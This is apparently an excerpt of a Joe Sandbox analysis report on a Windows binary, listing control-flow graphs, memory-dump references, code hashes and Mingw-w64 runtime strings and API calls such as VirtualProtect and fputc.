                                                                      • Instruction Fuzzy Hash: F4513121B29F0189EB10EBE1E8D03EAA365AF447A4FA0413ADD0D477A5EE2DD559C314

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 108 7ff71c8c2cc0-7ff71c8c2ce5 109 7ff71c8c2da8-7ff71c8c2db7 108->109 110 7ff71c8c2ceb-7ff71c8c2cf8 108->110 113 7ff71c8c2df0-7ff71c8c2df5 109->113 114 7ff71c8c2db9-7ff71c8c2dbc 109->114 111 7ff71c8c2d95 110->111 112 7ff71c8c2cfe 110->112 116 7ff71c8c2d9c-7ff71c8c2da3 111->116 115 7ff71c8c2d01-7ff71c8c2d07 112->115 113->115 118 7ff71c8c2dfb-7ff71c8c2dff 113->118 117 7ff71c8c2dc0-7ff71c8c2dd8 call 7ff71c8c2ad0 114->117 119 7ff71c8c2d28-7ff71c8c2d2f 115->119 133 7ff71c8c2dda-7ff71c8c2ddf 117->133 121 7ff71c8c2d71-7ff71c8c2d74 118->121 124 7ff71c8c2d31-7ff71c8c2d37 119->124 125 7ff71c8c2d39-7ff71c8c2d43 119->125 122 7ff71c8c2d76-7ff71c8c2d7c 121->122 123 7ff71c8c2d7e-7ff71c8c2d84 121->123 122->123 127 7ff71c8c2d5b-7ff71c8c2d5e 122->127 128 7ff71c8c2d50-7ff71c8c2d58 123->128 129 7ff71c8c2d86-7ff71c8c2d93 fputc 123->129 124->125 130 7ff71c8c2d1a-7ff71c8c2d23 124->130 131 7ff71c8c2d10-7ff71c8c2d17 125->131 132 7ff71c8c2d45-7ff71c8c2d4d fputc 125->132 134 7ff71c8c2d61-7ff71c8c2d6c 127->134 128->127 129->127 130->134 135 7ff71c8c2d25 130->135 131->130 132->130 133->112 136 7ff71c8c2de5 133->136 134->116 137 7ff71c8c2d6e 134->137 135->119 136->134 137->121
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fputc
                                                                      • String ID:
                                                                      • API String ID: 1992160199-0
                                                                      • Opcode ID: 4538d32ceec3dca7f12e159fcdf27e8c1efa2a33f683ce578554921e2bd15e56
                                                                      • Instruction ID: 5e0f70baf71ee82e620931ad212d1e515e0406fcf34c713c8c916fbed1e9926b
                                                                      • Opcode Fuzzy Hash: 4538d32ceec3dca7f12e159fcdf27e8c1efa2a33f683ce578554921e2bd15e56
                                                                      • Instruction Fuzzy Hash: B7418372A14B068BE350DF69C0807EDB7E1EB94B65F75C235D70C472C8DA38E8558B24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $Infinity$NaN
                                                                      • API String ID: 0-3274152445
                                                                      • Opcode ID: 4abaa2ad451354b0e1059ba36ecd3988c05ea4d0e4efb7f34230c85d63f40b8e
                                                                      • Instruction ID: d2f145c732b98a5fb615ca3391430b610f2419331b807c88e44361e4c2824139
                                                                      • Opcode Fuzzy Hash: 4abaa2ad451354b0e1059ba36ecd3988c05ea4d0e4efb7f34230c85d63f40b8e
                                                                      • Instruction Fuzzy Hash: 39D2E932A2CB818BE7119F65E0807EAF7A0FB857A4F644135EA4A43B45DB3DF4548F24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 779 7ff71c8c1d70-7ff71c8c1d8f 780 7ff71c8c1d91-7ff71c8c1da1 779->780 781 7ff71c8c1da8-7ff71c8c1dff call 7ff71c8c26f0 call 7ff71c8c2950 779->781 781->780 786 7ff71c8c1e01-7ff71c8c1e07 781->786 787 7ff71c8c1f10-7ff71c8c1f12 786->787 788 7ff71c8c1e0d-7ff71c8c1e11 786->788 789 7ff71c8c2080-7ff71c8c2083 787->789 791 7ff71c8c1f18-7ff71c8c1f20 787->791 788->789 790 7ff71c8c1e17 788->790 789->780 794 7ff71c8c2089 789->794 793 7ff71c8c1e1a-7ff71c8c1e1c 790->793 792 7ff71c8c1f26 791->792 791->793 797 7ff71c8c1f30-7ff71c8c1f3c 792->797 793->789 796 7ff71c8c1e22-7ff71c8c1e28 793->796 795 7ff71c8c2090-7ff71c8c20ab call 7ff71c8c1c00 794->795 809 7ff71c8c20ad 795->809 799 7ff71c8c20c0-7ff71c8c20e2 call 7ff71c8c1b90 796->799 800 7ff71c8c1e2e-7ff71c8c1e35 796->800 801 7ff71c8c1f42-7ff71c8c1f51 797->801 802 7ff71c8c2068-7ff71c8c2070 797->802 817 7ff71c8c20e4-7ff71c8c2108 799->817 818 7ff71c8c2109-7ff71c8c210d 799->818 800->780 805 7ff71c8c1e3b-7ff71c8c1e48 800->805 807 7ff71c8c1f53-7ff71c8c1f5a 801->807 808 7ff71c8c1f62-7ff71c8c1f74 call 7ff71c8c1c00 801->808 806 7ff71c8c2076 802->806 802->807 811 7ff71c8c1eaf-7ff71c8c1ec6 805->811 806->808 812 7ff71c8c1ef3-7ff71c8c1f09 call 7ff71c8c1b90 807->812 813 7ff71c8c1f5c-7ff71c8c1f60 807->813 808->811 828 7ff71c8c1f7a 808->828 822 7ff71c8c20b2-7ff71c8c20bb call 7ff71c8c1b90 809->822 815 7ff71c8c1fd8-7ff71c8c1fe2 811->815 816 7ff71c8c1ecc 811->816 812->787 813->808 813->812 819 7ff71c8c1fe4-7ff71c8c1ff9 815->819 820 7ff71c8c2058-7ff71c8c2060 815->820 823 7ff71c8c1e50-7ff71c8c1e53 816->823 824 7ff71c8c1ece-7ff71c8c1ed1 816->824 817->818 826 7ff71c8c2017-7ff71c8c201f call 7ff71c8c1c00 819->826 827 7ff71c8c1ffb-7ff71c8c1ffe 819->827 820->827 833 7ff71c8c2062 820->833 822->799 823->797 831 7ff71c8c1e59-7ff71c8c1e5c 823->831 824->822 830 7ff71c8c1ed7-7ff71c8c1ee8 824->830 838 7ff71c8c2030-7ff71c8c203b call 7ff71c8c1c00 826->838 827->812 835 7ff71c8c2004-7ff71c8c2011 827->835 837 7ff71c8c1f80-7ff71c8c1f88 828->837 830->838 839 7ff71c8c1eee-7ff71c8c1ef1 830->839 831->822 840 7ff71c8c1e62-7ff71c8c1e6e 831->840 833->826 835->812 835->826 837->780 843 7ff71c8c1f8e-7ff71c8c1f9b 837->843 844 7ff71c8c1ea2-7ff71c8c1ea9 838->844 839->812 839->844 845 7ff71c8c2040-7ff71c8c2048 840->845 846 7ff71c8c1e74-7ff71c8c1e83 840->846 850 7ff71c8c1fa0-7ff71c8c1fb0 843->850 844->811 844->837 847 7ff71c8c1e85-7ff71c8c1e8c 845->847 851 7ff71c8c204e 845->851 846->847 848 7ff71c8c1e97-7ff71c8c1e9f call 7ff71c8c1c00 846->848 847->812 852 7ff71c8c1e8e-7ff71c8c1e95 847->852 848->844 854 7ff71c8c1fb2-7ff71c8c1fbd VirtualProtect 850->854 855 7ff71c8c1fbf-7ff71c8c1fce 850->855 851->848 852->812 852->848 854->855 855->850 857 7ff71c8c1fd0 855->857 857->780
                                                                      Strings
                                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF71C8C20B4
                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF71C8C20C0
                                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF71C8C1EFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                      • API String ID: 0-1286557213
                                                                      • Opcode ID: a48de7ea04901e760bad9afab67e89c840719b3d909c55dff15317a19347d95a
                                                                      • Instruction ID: 34d2923f28fe6d0e73f13db36a565b6ac98db7f934ceae58f3444ac5b03141e1
                                                                      • Opcode Fuzzy Hash: a48de7ea04901e760bad9afab67e89c840719b3d909c55dff15317a19347d95a
                                                                      • Instruction Fuzzy Hash: 74919422E29B5246EB107BD594C02F9E261BF557B4FA48231DD5C177D4DF3CE82A8228

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 858 7ff71c8c2116-7ff71c8c213b 859 7ff71c8c2141-7ff71c8c2146 858->859 860 7ff71c8c2200-7ff71c8c2204 858->860 862 7ff71c8c218f-7ff71c8c2199 859->862 863 7ff71c8c2148-7ff71c8c214d 859->863 860->859 861 7ff71c8c220a 860->861 864 7ff71c8c21f0-7ff71c8c21f5 861->864 865 7ff71c8c2210 862->865 866 7ff71c8c219b-7ff71c8c21a2 862->866 867 7ff71c8c21b0-7ff71c8c21b5 863->867 868 7ff71c8c214f-7ff71c8c2157 863->868 870 7ff71c8c2212-7ff71c8c2217 864->870 865->870 866->867 871 7ff71c8c2260-7ff71c8c2270 call 7ff71c8c7fb8 867->871 872 7ff71c8c21bb 867->872 868->864 869 7ff71c8c215d-7ff71c8c2168 868->869 869->862 879 7ff71c8c2272-7ff71c8c2275 871->879 880 7ff71c8c229c-7ff71c8c22ab signal 871->880 874 7ff71c8c2220-7ff71c8c2225 872->874 875 7ff71c8c21bd-7ff71c8c21c2 872->875 874->862 876 7ff71c8c222b 874->876 875->864 878 7ff71c8c21c4-7ff71c8c21c9 875->878 876->864 878->862 881 7ff71c8c21cb-7ff71c8c21db signal 878->881 879->862 882 7ff71c8c227b-7ff71c8c2282 879->882 880->864 883 7ff71c8c21e1-7ff71c8c21e4 881->883 884 7ff71c8c22b0-7ff71c8c22bf signal 881->884 882->864 883->862 885 7ff71c8c21e6-7ff71c8c21ed 883->885 884->864 885->864
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: signal
                                                                      • String ID: CCG
                                                                      • API String ID: 1946981877-1584390748
                                                                      • Opcode ID: e17495df2833413120c66832d229048d27d7095b12996ca080349749cd9857c4
                                                                      • Instruction ID: ce83422d68a77a6147a5fd6efdf50cab4099d22372eb974b84f350f885b984d4
                                                                      • Opcode Fuzzy Hash: e17495df2833413120c66832d229048d27d7095b12996ca080349749cd9857c4
                                                                      • Instruction Fuzzy Hash: 1D215A21E28B0646FB6872E544D13F9D1819F89330FB98537CA2D823D5CD1CB8A95139
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: b1cc8295f4589949e1a95339fcec62e27a85a0d60d03e1e284163e2cea26f545
                                                                      • Instruction ID: a9c50b178c44dc5311e510660a9b705fb996f51469d13b100efa655b8598e5a8
                                                                      • Opcode Fuzzy Hash: b1cc8295f4589949e1a95339fcec62e27a85a0d60d03e1e284163e2cea26f545
                                                                      • Instruction Fuzzy Hash: EAB13F22A3CB4242F7296DA9D0947F9E151FBD0BA4FA48135DE0E477C4DE3CE9988324
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21bc25e796c4aa4f1df9bc1f021895828adaecb062952485d3021ffe85e8d9a9
                                                                      • Instruction ID: 86451c1b0db450560f8ab254e2bdc3a15f3fb552475a10579dfac18c38d6bc53
                                                                      • Opcode Fuzzy Hash: 21bc25e796c4aa4f1df9bc1f021895828adaecb062952485d3021ffe85e8d9a9
                                                                      • Instruction Fuzzy Hash: 7231358BE2DFD149F35265B40CBA1E45FD16BA2A3279D407ECE58077C3A8097C29D325
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 000e85264ce1ab80e9869d57bb3dc2b393154ec0b34ef4b7406e5cbef96d339c
                                                                      • Instruction ID: 6a277cb6a10f76c320bb3dec369f06050e6c0770bf56a4503a92678dc59f1cd6
                                                                      • Opcode Fuzzy Hash: 000e85264ce1ab80e9869d57bb3dc2b393154ec0b34ef4b7406e5cbef96d339c
                                                                      • Instruction Fuzzy Hash: 48A0021285DD01C0F3041B40E8412F4A22AD70A314F947134D018511A18A2DA4648118

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 205 7ff71c8c1b90-7ff71c8c1c13 call 7ff71c8c79b0 call 7ff71c8c7f90 call 7ff71c8c79b0 call 7ff71c8c7fd8 call 7ff71c8c7f50 217 7ff71c8c1d30-7ff71c8c1d32 205->217 218 7ff71c8c1c19-7ff71c8c1c27 205->218 220 7ff71c8c1c58-7ff71c8c1c66 call 7ff71c8c2670 217->220 219 7ff71c8c1c30-7ff71c8c1c36 218->219 221 7ff71c8c1c38-7ff71c8c1c45 219->221 222 7ff71c8c1c4b-7ff71c8c1c56 219->222 226 7ff71c8c1d52-7ff71c8c1d8f call 7ff71c8c1b90 220->226 227 7ff71c8c1c6c-7ff71c8c1cb4 call 7ff71c8c27b0 VirtualQuery 220->227 221->222 224 7ff71c8c1cd5-7ff71c8c1cdc 221->224 222->219 222->220 235 7ff71c8c1d91-7ff71c8c1da1 226->235 236 7ff71c8c1da8-7ff71c8c1dff call 7ff71c8c26f0 call 7ff71c8c2950 226->236 233 7ff71c8c1cba-7ff71c8c1cc4 227->233 234 7ff71c8c1d37-7ff71c8c1d48 227->234 237 7ff71c8c1cc6-7ff71c8c1ccc 233->237 238 7ff71c8c1cce 233->238 234->226 239 7ff71c8c1d4d call 7ff71c8c1b90 234->239 236->235 248 7ff71c8c1e01-7ff71c8c1e07 236->248 237->238 241 7ff71c8c1ce0-7ff71c8c1d16 VirtualProtect 237->241 238->224 239->226 241->238 243 7ff71c8c1d18-7ff71c8c1d2c GetLastError call 7ff71c8c1b90 241->243 243->217 249 7ff71c8c1f10-7ff71c8c1f12 248->249 250 7ff71c8c1e0d-7ff71c8c1e11 248->250 251 7ff71c8c2080-7ff71c8c2083 249->251 253 7ff71c8c1f18-7ff71c8c1f20 249->253 250->251 252 7ff71c8c1e17 250->252 251->235 256 7ff71c8c2089 251->256 255 7ff71c8c1e1a-7ff71c8c1e1c 252->255 254 7ff71c8c1f26 253->254 253->255 259 7ff71c8c1f30-7ff71c8c1f3c 254->259 255->251 258 7ff71c8c1e22-7ff71c8c1e28 255->258 257 7ff71c8c2090-7ff71c8c20ab call 7ff71c8c1c00 256->257 271 7ff71c8c20ad 257->271 261 7ff71c8c20c0-7ff71c8c20e2 call 7ff71c8c1b90 258->261 262 7ff71c8c1e2e-7ff71c8c1e35 258->262 263 7ff71c8c1f42-7ff71c8c1f51 259->263 264 7ff71c8c2068-7ff71c8c2070 259->264 279 7ff71c8c20e4-7ff71c8c2108 261->279 280 7ff71c8c2109-7ff71c8c210d 261->280 262->235 267 7ff71c8c1e3b-7ff71c8c1e48 262->267 269 7ff71c8c1f53-7ff71c8c1f5a 263->269 270 7ff71c8c1f62-7ff71c8c1f74 call 7ff71c8c1c00 263->270 268 7ff71c8c2076 264->268 264->269 273 7ff71c8c1eaf-7ff71c8c1ec6 267->273 268->270 274 7ff71c8c1ef3-7ff71c8c1f09 call 7ff71c8c1b90 269->274 275 7ff71c8c1f5c-7ff71c8c1f60 269->275 270->273 290 7ff71c8c1f7a 270->290 284 7ff71c8c20b2-7ff71c8c20bb call 7ff71c8c1b90 271->284 277 7ff71c8c1fd8-7ff71c8c1fe2 273->277 278 7ff71c8c1ecc 273->278 274->249 275->270 275->274 281 7ff71c8c1fe4-7ff71c8c1ff9 277->281 282 7ff71c8c2058-7ff71c8c2060 277->282 285 7ff71c8c1e50-7ff71c8c1e53 278->285 286 7ff71c8c1ece-7ff71c8c1ed1 278->286 279->280 288 7ff71c8c2017-7ff71c8c201f call 7ff71c8c1c00 281->288 289 7ff71c8c1ffb-7ff71c8c1ffe 281->289 282->289 295 7ff71c8c2062 282->295 284->261 285->259 293 7ff71c8c1e59-7ff71c8c1e5c 285->293 286->284 292 7ff71c8c1ed7-7ff71c8c1ee8 286->292 300 7ff71c8c2030-7ff71c8c203b call 7ff71c8c1c00 288->300 289->274 297 7ff71c8c2004-7ff71c8c2011 289->297 299 7ff71c8c1f80-7ff71c8c1f88 290->299 292->300 301 7ff71c8c1eee-7ff71c8c1ef1 292->301 293->284 302 7ff71c8c1e62-7ff71c8c1e6e 293->302 295->288 297->274 297->288 299->235 305 7ff71c8c1f8e-7ff71c8c1f9b 299->305 306 7ff71c8c1ea2-7ff71c8c1ea9 300->306 301->274 301->306 307 7ff71c8c2040-7ff71c8c2048 302->307 308 7ff71c8c1e74-7ff71c8c1e83 302->308 312 7ff71c8c1fa0-7ff71c8c1fb0 305->312 306->273 306->299 309 7ff71c8c1e85-7ff71c8c1e8c 307->309 313 7ff71c8c204e 307->313 308->309 310 7ff71c8c1e97-7ff71c8c1e9f call 7ff71c8c1c00 308->310 309->274 314 7ff71c8c1e8e-7ff71c8c1e95 309->314 310->306 316 7ff71c8c1fb2-7ff71c8c1fbd VirtualProtect 312->316 317 7ff71c8c1fbf-7ff71c8c1fce 312->317 313->310 314->274 314->310 316->317 317->312 319 7ff71c8c1fd0 317->319 319->235
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: QueryVirtual
                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                      • API String ID: 1804819252-1534286854
                                                                      • Opcode ID: 40c8c994400402f600e035479c1fb89154e4aeef581b152615233888ed21daec
                                                                      • Instruction ID: a93ff1abfe2da7ffcb66bafe5b92d365fa49891134ef105640bc9fd8dce86ccb
                                                                      • Opcode Fuzzy Hash: 40c8c994400402f600e035479c1fb89154e4aeef581b152615233888ed21daec
                                                                      • Instruction Fuzzy Hash: EC51A332A24F4685EB10BB91E8C06E9E760FB45BA0FE44135EE4C07394DE3CE46AC758

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 687 7ff71c8c2f00-7ff71c8c2f1e 688 7ff71c8c31f0-7ff71c8c320a 687->688 689 7ff71c8c2f24-7ff71c8c2f3e 687->689 692 7ff71c8c3250-7ff71c8c3278 call 7ff71c8c2950 688->692 693 7ff71c8c320c 688->693 690 7ff71c8c2f44-7ff71c8c2f4e 689->690 691 7ff71c8c3028-7ff71c8c3058 call 7ff71c8c2950 689->691 696 7ff71c8c2f50-7ff71c8c2f61 690->696 697 7ff71c8c2f64-7ff71c8c2f9c call 7ff71c8c2950 690->697 704 7ff71c8c2fa8-7ff71c8c2fb4 691->704 705 7ff71c8c305e-7ff71c8c3068 691->705 711 7ff71c8c3288 692->711 698 7ff71c8c3220-7ff71c8c3224 693->698 696->697 697->705 707 7ff71c8c2fa2 697->707 702 7ff71c8c322a-7ff71c8c3235 698->702 703 7ff71c8c3308-7ff71c8c330e 698->703 712 7ff71c8c3370 702->712 713 7ff71c8c323b-7ff71c8c3245 702->713 708 7ff71c8c3314-7ff71c8c331f 703->708 709 7ff71c8c33a8-7ff71c8c33af 703->709 710 7ff71c8c2fba-7ff71c8c2fbe 704->710 704->711 714 7ff71c8c3070-7ff71c8c309a 705->714 707->704 716 7ff71c8c3321-7ff71c8c3328 708->716 717 7ff71c8c32b4-7ff71c8c32c3 708->717 715 7ff71c8c2fda-7ff71c8c2fdd 709->715 718 7ff71c8c2fc1-7ff71c8c2fd5 memset 710->718 720 7ff71c8c328b-7ff71c8c328e 711->720 721 7ff71c8c3377-7ff71c8c3386 712->721 719 7ff71c8c30e0-7ff71c8c30e6 713->719 714->714 722 7ff71c8c309c-7ff71c8c309f 714->722 715->720 724 7ff71c8c2fe3-7ff71c8c2ff0 715->724 723 7ff71c8c3007-7ff71c8c300a 716->723 717->719 728 7ff71c8c32c9-7ff71c8c32cc 717->728 718->715 725 7ff71c8c3340-7ff71c8c3347 719->725 726 7ff71c8c30ec-7ff71c8c30ef 719->726 720->724 727 7ff71c8c3294-7ff71c8c32ab 720->727 729 7ff71c8c3358-7ff71c8c335b 721->729 730 7ff71c8c3388-7ff71c8c3399 721->730 722->704 731 7ff71c8c30a5-7ff71c8c30a8 722->731 739 7ff71c8c3010-7ff71c8c301f 723->739 740 7ff71c8c31de-7ff71c8c31ee 723->740 733 7ff71c8c32b1 724->733 734 7ff71c8c2ff6-7ff71c8c3001 724->734 737 7ff71c8c3404-7ff71c8c3407 725->737 738 7ff71c8c334d-7ff71c8c3354 725->738 735 7ff71c8c30f5-7ff71c8c30ff 726->735 736 7ff71c8c33b9-7ff71c8c33c5 726->736 727->733 727->734 728->735 742 7ff71c8c32d2-7ff71c8c32de 728->742 729->740 741 7ff71c8c3361-7ff71c8c3368 729->741 730->729 731->698 732 7ff71c8c30ae-7ff71c8c30bb 731->732 743 7ff71c8c30c1-7ff71c8c30c5 732->743 744 7ff71c8c33a0-7ff71c8c33a3 732->744 733->717 734->723 748 7ff71c8c33b4-7ff71c8c33b7 734->748 749 7ff71c8c3330-7ff71c8c3333 735->749 750 7ff71c8c3105-7ff71c8c3108 735->750 736->735 745 7ff71c8c33cb-7ff71c8c33e8 memset 736->745 746 7ff71c8c3419-7ff71c8c3425 737->746 747 7ff71c8c3409-7ff71c8c3410 737->747 738->729 751 7ff71c8c3150-7ff71c8c315a 739->751 741->712 742->735 752 7ff71c8c32e4-7ff71c8c32f7 memset 742->752 743->703 756 7ff71c8c30cb-7ff71c8c30d0 743->756 744->718 753 7ff71c8c32fb-7ff71c8c3301 745->753 757 7ff71c8c33ee-7ff71c8c33ff 745->757 746->747 759 7ff71c8c3427 746->759 747->746 748->721 749->751 758 7ff71c8c3339 749->758 760 7ff71c8c3110-7ff71c8c3121 call 7ff71c8c2ad0 750->760 754 7ff71c8c3164-7ff71c8c3170 751->754 755 7ff71c8c315c-7ff71c8c3162 751->755 752->753 753->729 762 7ff71c8c3172-7ff71c8c3183 fputc 754->762 763 7ff71c8c3138-7ff71c8c313f 754->763 755->754 761 7ff71c8c3142-7ff71c8c314b 755->761 756->712 764 7ff71c8c30d6-7ff71c8c30dc 756->764 757->729 765 7ff71c8c31aa-7ff71c8c31b0 758->765 759->745 775 7ff71c8c3123-7ff71c8c312c 760->775 767 7ff71c8c3185-7ff71c8c3188 761->767 768 7ff71c8c314d 761->768 762->767 762->768 763->761 764->719 769 7ff71c8c31b2-7ff71c8c31b8 765->769 770 7ff71c8c31ba-7ff71c8c31c3 765->770 772 7ff71c8c318a 767->772 773 7ff71c8c31a7 767->773 768->751 769->770 774 7ff71c8c319b-7ff71c8c31a5 769->774 776 7ff71c8c3190-7ff71c8c3198 770->776 777 7ff71c8c31c5-7ff71c8c31dc fputc 770->777 772->740 773->765 774->740 774->773 775->768 778 7ff71c8c312e 775->778 776->774 777->740 777->773 778->740
                                                                      APIs
                                                                      Memory Dump Source
